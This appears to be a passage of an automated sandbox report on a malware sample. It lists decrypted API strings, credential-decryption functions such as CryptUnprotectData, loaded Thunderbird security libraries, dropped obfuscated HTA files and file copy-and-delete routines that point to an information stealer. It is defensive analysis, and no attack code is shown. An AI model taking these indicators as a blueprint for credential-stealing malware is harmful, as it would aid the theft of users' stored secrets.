                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetOpenA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetConnectA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetConnectA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HttpOpenRequestA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HttpOpenRequestA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HttpSendRequestA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HttpSendRequestA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HttpQueryInfoA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: HttpQueryInfoA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetCloseHandle
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetCloseHandle
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetReadFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetReadFile
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetSetOptionA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetSetOptionA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetOpenUrlA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetOpenUrlA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetCrackUrlA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: InternetCrackUrlA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: wsprintfA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: wsprintfA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CharToOemW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CharToOemW
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetKeyboardLayoutList
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetKeyboardLayoutList
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: EnumDisplayDevicesA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: EnumDisplayDevicesA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ReleaseDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: ReleaseDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemMetrics
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetSystemMetrics
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetDesktopWindow
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetDesktopWindow
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetWindowRect
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetWindowRect
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetWindowDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetWindowDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CloseWindow
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CloseWindow
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegOpenKeyExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegOpenKeyExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegQueryValueExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegQueryValueExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegCloseKey
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegCloseKey
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentHwProfileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetCurrentHwProfileA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegEnumKeyExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegEnumKeyExA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegGetValueA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: RegGetValueA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateDCA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateDCA
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetDeviceCaps
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: GetDeviceCaps
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateCompatibleDC
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: CreateCompatibleDC
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree,17_2_00408E30
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,17_2_00408D90
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA,17_2_00405450
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,17_2_004090C0
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00408AB0 CryptUnprotectData,17_2_00408AB0

                                      Phishing

                                      barindex
                                      Yara detected obfuscated html page
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, type: DROPPED
                                      Source: Yara matchFile source: C:\Temp\J9hHfTRUK.hta, type: DROPPED
                                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta, type: DROPPED

                                      Compliance

                                      barindex
                                      Detected unpacking (creates a PE file in dynamic memory)
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeUnpacked PE file: 17.2.m0wsoI3.exe.60900000.1.unpack
                                      Source: M6gQuZPvgY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599541837.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600168948.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\win32api.pdb!! source: trano1221.exe, 0000002A.00000002.1973015383.00007FF98B681000.00000040.00000001.01000000.0000003B.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1589374900.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdb source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591172756.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588949427.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1597912717.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599207028.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600305599.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589825821.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598486784.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1595664997.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599069389.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589063022.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.9 30 May 20233.0.9built on: Tue Jul 11 19:52:20 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: trano1221.exe, 0000002A.00000002.1980923674.00007FF98C161000.00000040.00000001.01000000.0000002C.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591679400.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588680873.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589182480.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598930353.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: trano1221.exe, 0000002A.00000002.1996605213.00007FF98C9D1000.00000040.00000001.01000000.00000029.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: trano1221.exe, 0000002A.00000002.2030594224.00007FF9A3331000.00000040.00000001.01000000.00000027.sdmp
                                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593203015.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdbUGP source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600657542.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589681525.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: trano1221.exe, 0000002A.00000002.1975488711.00007FF98BB50000.00000040.00000001.01000000.00000033.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb}},GCTL source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: trano1221.exe, 0000002A.00000002.1986859487.00007FF98C331000.00000040.00000001.01000000.00000036.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1596701757.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591525735.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb** source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588821073.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598775483.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1590455368.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599693153.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: trano1221.exe, 00000023.00000003.1592148006.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E76B000.00000040.00000001.01000000.0000001C.sdmp
                                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591309503.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599866003.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600849374.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593372329.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598137593.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593530214.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: trano1221.exe, 00000023.00000003.1589513980.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600027684.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1590256912.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589946129.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1941606459.000001E16B3B0000.00000002.00000001.01000000.0000001E.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdb source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599377266.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600505618.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: trano1221.exe, 0000002A.00000002.1984942451.00007FF98C2E1000.00000040.00000001.01000000.0000002B.sdmp
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeCode function: 13_2_0097EF71 FindFirstFileExW,13_2_0097EF71
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeCode function: 14_2_0041EF71 FindFirstFileExW,14_2_0041EF71
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_00407620
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00401280
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,17_2_00401090
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040A150
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,17_2_0040B570
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,17_2_0040B110
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeCode function: 17_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,17_2_0040B3A0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,18_2_006ADBBE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_0067C2A2 FindFirstFileExW,18_2_0067C2A2
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B68EE FindFirstFileW,FindClose,18_2_006B68EE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,18_2_006B698F
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_006AD076
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_006AD3A9
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_006B9642
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_006B979D
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,18_2_006B9B2B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B5C97 FindFirstFileW,FindNextFileW,FindClose,18_2_006B5C97
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\userJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppDataJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
